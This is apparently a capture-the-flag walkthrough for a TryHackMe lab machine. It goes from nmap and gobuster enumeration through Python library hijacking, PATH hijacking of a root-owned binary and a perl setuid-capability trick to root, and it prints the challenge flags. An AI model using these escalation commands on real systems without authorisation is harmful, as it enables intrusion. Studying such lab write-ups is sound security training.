user hopping
The interesting thing with this machine is that there are quite a few users involved that we must own step by step to finally get to root. You can find the machine over at tryhackme.com
Lets dive right in and start with a portscan.
sudo nmap -sV 10.10.45.109
So – only web and ssh. Since we cant do much with ssh without any credentials lets look at the web first. And wile we look at the webpage we run gobuster
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109 -x php,txt,html,js,pdf
The website doesnt reveal anything – neither does the source code of the page.
There is only the hint to “follow the white rabbit”
Let’s look at what gobuster revealed:
Thats also not to exciting. The img directory unveals images as expected so lets look at /r first
There is a page saying “keep going”
So let’s try gobuster one more time – this time on the /r directory.
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109/r -x php,txt,html,js,pdf
Hm. We have /r and /a now.
And again the page under /r/a tells us to get going.
So one last time:
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109/r/a -x php,txt,html,js,pdf
So the First page told us to “follow the white rabbit” and we have a URL now that reads /r/a/b and all those pages tell us to keep going.
We will take an educated guess here and try if we find anything at /r/a/b/b/i/t
Ok. another AiW quote. Not much to see. Let’s look at the source code.
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
Finally something interesting.
We will try these credentials on the ssh server that we found earlier.
ssh -l alice 10.10.45.109
That worked – let’s look around.
There are a couple of interesting things here.
We are user alice and looking at our home directory.
There is the root.txt flag – but we cant read it.
There is no user.txt flag but there is this weird walrus_and_the_carpenter.py that is also owned by root.
Let’s first see what sudo can do for us:
sudo -l
so we can run /home/alice/walrus_and_the_carpenter.py as user rabbit. Thats at least something.
So lets look at the code
vi walrus_and_the_carpenter.py
We cut it off here because this is already the interesting part.
We cannot change the file – but we see it is importing a library here: random
So the goal is now to create a python library that gives us a shell and to sneak it in instead of the original library.
Python looks for libraries in the current directoy first. So lets try.
echo -n 'import os;os.system("/bin/bash")' > random.py
So we know from earlier that we have to run this command as user rabbit – if we did everything right we should be the user rabbit after running walrus_and_the_carpenter.py
Let’s try that:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Since we are user rabbit now lets look into his home directory.
cd /home/rabbit
ls -la
Seems like we should look at the file teaParty which is owned by root but executable by everybody. Thats interesting.
Lets use the strings command to look into it
Hm. That didn’t work. The strings command is not installed. So we have to get the teaParty file to our local system to look into it.
We already know that we can use python so we do a simple
python3 -m http.server
Wich brings up a simple webserver in the current directory listening on port 8000
On our local machine we then do a wget to download the file
wget http://10.10.45.109:8000/teaParty
Now we can inspect the file as planned
What we are looking for is something similar to what we looked for in the source code of the python file earlier
strings teaParty
reveals an interesting line:
/bin/echo -n 'Probably by ' && date --date='next hour' -R
echo is called by using it’s absolute path – but date is not.
So if we create a file by that name that gives us a shell when executed and manipulate the PATH variable – that should work.
echo "/bin/bash" > date
chmod +x date
export PATH=/home/rabbit:$PATH
So now when we execute teaParty it will use the PATH variable to find the date command. The first place it will look is now /home/rabbit where it finds our “version” of the date command and use that instead of the “correct” version.
That should give us the shell then.
Lets try.
./teaParty
Great. That worked as expected. We are now user hatter.
Let’s look into his home directory.
cd /home/hatter
la -la
We see a file called password.txt in there. Lets cat it out:
cat password.txt
Now that we have his password – let’s become hatter:
su hatter
Being a bit stuck here let’s look around what files belong to the group hatter that we are now part off
find / -group hatter 2>/dev/null | more
Now this is interesting. Besides the files in out home directory the files /usr/bin/perl5.26.1 and /usr/bin/perl are also belonging to the group hatter. (the things below are just noise)
Let’s look at them with getcap to see if they have special capabilities.
We will talk about capabilities in a later article – for now its enough to know thats its an addition to the linux permission system and it used carelessly can be exploitet.
getcap /usr/bin/perl5.26.1
getcap /usr/bin/perl
That looks good. Now that we know that we can go to
https://gtfobins.github.io/gtfobins/perl/#capabilities
and look for help.
There is something for us so let’s try it right away:
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Finally root. That was a long way. Let’s collect the flags now.
We remember that the root flag was in /home/alice
cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
Since the root flag was in a home directory of a user, let’s look if the user flag is in the hone directory of root
cat /root/user.txt
thm{"Curiouser and curiouser!"}
Conclusion
That was a long one. We had to go from user alice to user rabbit, then to hatter so we finally would get root.
The fun thing is that throughout the process we use a couple of different techniques for privilege escalation.
As always: let me know what you think in the comments below.